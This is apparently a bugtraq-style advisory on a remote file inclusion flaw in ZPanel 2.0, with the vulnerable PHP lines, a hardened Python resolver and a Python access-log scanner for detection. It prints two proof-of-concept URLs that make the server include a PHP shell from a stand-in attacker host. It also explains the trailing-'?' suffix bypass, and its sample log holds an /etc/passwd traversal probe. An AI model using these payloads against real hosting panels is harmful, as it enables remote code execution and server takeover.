
‫"ت‬#$% &'() &* +,-‫ز‬#*

:!"#$%

ZPanel Remote File Inclusion


ZPanel is a hosting control panel used by web hosts to give their users a friendly interface
to manage any aspects of their hosting or account information.
ZPanel is an open source project and runs on Windows and Linux.
ZPanel tested on:
Windows: 2000 Adv. Server, 2000 Server, 2003 Ent. Server, XP Professional
Linux: SuSE 9.1, 9.2, Debian, Fedora 2, FreeBSD 4.9, 5.2.1, Mandrake 9.1, 9.2, Redhat 7.9, 9

http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel

Credit:
The information has been provided by Hamid Ebadi.
The original article can be found at: http://www.bugtraq.ir

Vulnerable Systems:
Version: ZPanel 2.0 (and below)
(also tested on ZPanel-v25-BETA11)

Description:
Input passed to the "page" parameter in "zpanel.php" and the "body" parameter in
"templates/ZPanelV2/template.php" isn't properly verified before it is used to include files.
This can be exploited to include arbitrary files from remote and local resources, which gives
an attacker PHP code execution in the context of the web server.

Vulnerable Code:

http://[host]/ZPanel/zpanel.php

// zpanel.php line : 21
// $body is taken straight from the query string; only ".php" is appended
if (!isset($_GET['page'])) {
    $body = "main.php";
} else {
    $body = $_GET['page'] . ".php";
}
// ...

// line : 38
// Loading template
$templatefolder = $row_Config['template'];
include('templates/'.$templatefolder.'/template.php');

http://[host]/ZPanel/templates/ZPanelV2/template.php

// template.php
// line : 63
// $body is included as-is; when template.php is requested directly the script
// never assigns it, so it can only arrive from the request (register_globals)
<?php include ($body); ?>
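To make the two include sinks concrete, the following Python model (an added example, not ZPanel's own code) rebuilds $body exactly as zpanel.php does, classifies what PHP's include() would open for that value, and places a hardened resolver beside it. The allow-list of page names ("main", "domains", "mail") and the throwaway pages directory are assumptions made for the demo.

```python
"""Model of the two include sinks quoted above, plus a hardened resolver.
Added example: none of this is ZPanel's own code."""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit


def vulnerable_body(page):
    """Mirror zpanel.php line 21: $body = $_GET['page'] . ".php" (or main.php)."""
    return "main.php" if page is None else page + ".php"


def describe_include(body):
    """Classify what PHP's include($body) would open.

    For a URL target PHP fetches the resource at the URL's path and treats
    everything after '?' as the query string.  That is why a payload ending
    in '?' survives the ".php" suffix appended by zpanel.php: the suffix is
    shipped to the attacker's server as a query string, not as part of the
    file name.
    """
    parts = urlsplit(body)
    if parts.scheme.lower() in ("http", "https", "ftp"):
        return {"kind": "remote", "host": parts.netloc,
                "fetched_path": parts.path, "query": parts.query}
    return {"kind": "local", "path": body}


# Hardened replacement for the zpanel.php snippet.  The allow-list of page
# names is an assumption for the demo; a real deployment lists its own pages.
ALLOWED_PAGES = ("main", "domains", "mail")
PAGE_NAME = re.compile(r"^[a-z0-9_]{1,32}$")


def hardened_body(page, pages_dir):
    """Return the absolute path of the page script to include, or None.

    Two independent checks: the name must be on the allow-list (so URLs,
    '..' and anything containing a slash are rejected before the file
    system is touched), and the resolved path must still sit inside
    pages_dir and exist as a regular file.
    """
    if page is None:
        page = "main"
    if not PAGE_NAME.match(page) or page not in ALLOWED_PAGES:
        return None
    root = Path(pages_dir).resolve()
    target = (root / (page + ".php")).resolve()
    if root not in target.parents or not target.is_file():
        return None
    return str(target)


def make_pages_dir():
    """Create a throwaway pages directory holding only main.php (demo fixture)."""
    d = Path(tempfile.mkdtemp(prefix="zpanel_pages_"))
    (d / "main.php").write_text("<?php echo 'main'; ?>\n")
    return str(d)


if __name__ == "__main__":
    payload = "http://attacker/phpshell.txt?"
    print(describe_include(vulnerable_body(payload)))
    print(describe_include(vulnerable_body("http://attacker/phpshell.txt")))
    pages = make_pages_dir()
    print(hardened_body(payload, pages), hardened_body(None, pages))
```

Running the block shows the payload with the trailing "?" resolving to the attacker's /phpshell.txt with ".php" as its query string, while the same payload without the "?" would fetch /phpshell.txt.php; the hardened resolver rejects both and also rejects an allow-listed name whose file is missing.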

PoC exploit:
http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt?
http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt?

The trailing "?" matters for the first URL: zpanel.php appends ".php" to the value, so the
include target becomes http://attacker/phpshell.txt?.php and the ".php" reaches the attacker's
server as a query string instead of changing the file that is fetched. Both vectors need PHP
to allow URL wrappers in include() (allow_url_fopen, or allow_url_include on PHP 5.2 and
later); the second also needs register_globals, because template.php never assigns $body
itself when it is requested directly.
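On the detection side, the following Python scanner (an added example, not part of the advisory) pulls requests to the two include sinks out of Apache combined-format access log lines and flags values that carry a URL scheme or directory traversal, the latter covering the "local resources" case the description mentions. The log lines, hosts and timestamps are constructed for the demo.

```python
"""Access-log scanner for the two ZPanel include sinks.  Added example, not
part of the advisory; the log lines below are constructed for the demo."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined-format prefix: ip ident user [ts] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Script name -> the parameter that reaches include() in that script
SINK_PARAMS = {"zpanel.php": "page", "template.php": "body"}
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify_target(target):
    """Return (sink, param, value, reason) for a suspicious request, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    param = SINK_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs percent-decodes, so encoded payloads are inspected in the clear
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if SCHEME_RE.match(value):
            return script, param, value, "remote-url"
        if ".." in value.replace("\\", "/").split("/"):
            return script, param, value, "traversal"
    return None


def find_rfi_attempts(lines):
    """Scan log lines and return one finding dict per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_target(m["target"])
        if hit is None:
            continue
        script, param, value, reason = hit
        findings.append({
            "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
            "sink": script, "param": param, "value": value, "reason": reason,
            # a trailing '?' is the tell that the attacker is neutralising a
            # suffix the script appends (".php" in zpanel.php)
            "suffix_bypass": value.endswith("?"),
        })
    return findings


# Constructed sample: one benign request, the two PoC vectors (the second
# percent-encoded, as a scanner would send it), one traversal probe, one static file.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2005:10:01:02 +0000] "GET /ZPanel/zpanel.php?page=main HTTP/1.1" 200 5123
198.51.100.7 - - [12/Mar/2005:10:02:10 +0000] "GET /ZPanel/zpanel.php?page=http://attacker/phpshell.txt? HTTP/1.1" 200 812
198.51.100.7 - - [12/Mar/2005:10:02:14 +0000] "GET /ZPanel/templates/ZPanelV2/template.php?body=http%3A%2F%2Fattacker%2Fphpshell.txt%3F HTTP/1.1" 200 812
198.51.100.7 - - [12/Mar/2005:10:03:01 +0000] "GET /ZPanel/zpanel.php?page=../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [12/Mar/2005:10:04:00 +0000] "GET /ZPanel/images/logo.gif HTTP/1.1" 200 3321
""".splitlines()


if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f)
```

The sample yields three findings: both PoC vectors as remote-url hits with suffix_bypass set, and the /etc/passwd probe as a traversal hit; the benign page=main request and the static image are ignored. A 200 status on a remote-url hit is worth treating as a likely compromise rather than a mere attempt.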

# http://www.bugtraq.ir

Remote File Inclusion vulnerability in ZPanel (Persian version)


ZPanel is an open-source package for managing Windows and Linux web hosting, built on PHP and MySQL.

More information about this software is available at the addresses below:
http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel

Vulnerable versions:

ZPanel 2.0
ZPanel-v25-BETA11

Earlier versions are probably also vulnerable for the same reason.

Description:
Input to the "page" parameter in "zpanel.php" and the "body" parameter in
"templates/ZPanelV2/template.php" is not properly checked from a security standpoint before
being used for file inclusion. This lets an attacker include arbitrary files from remote and
local (server) sources, which in turn lets the attacker run arbitrary malicious code.

Vulnerable code: the same zpanel.php and template.php lines shown in the English section above.


Malicious code for proof of concept: the same two URLs shown in the English section above.


This vulnerability was discovered by Hamid Ebadi; all rights are reserved for Digital Security Media.
Hamid Ebadi
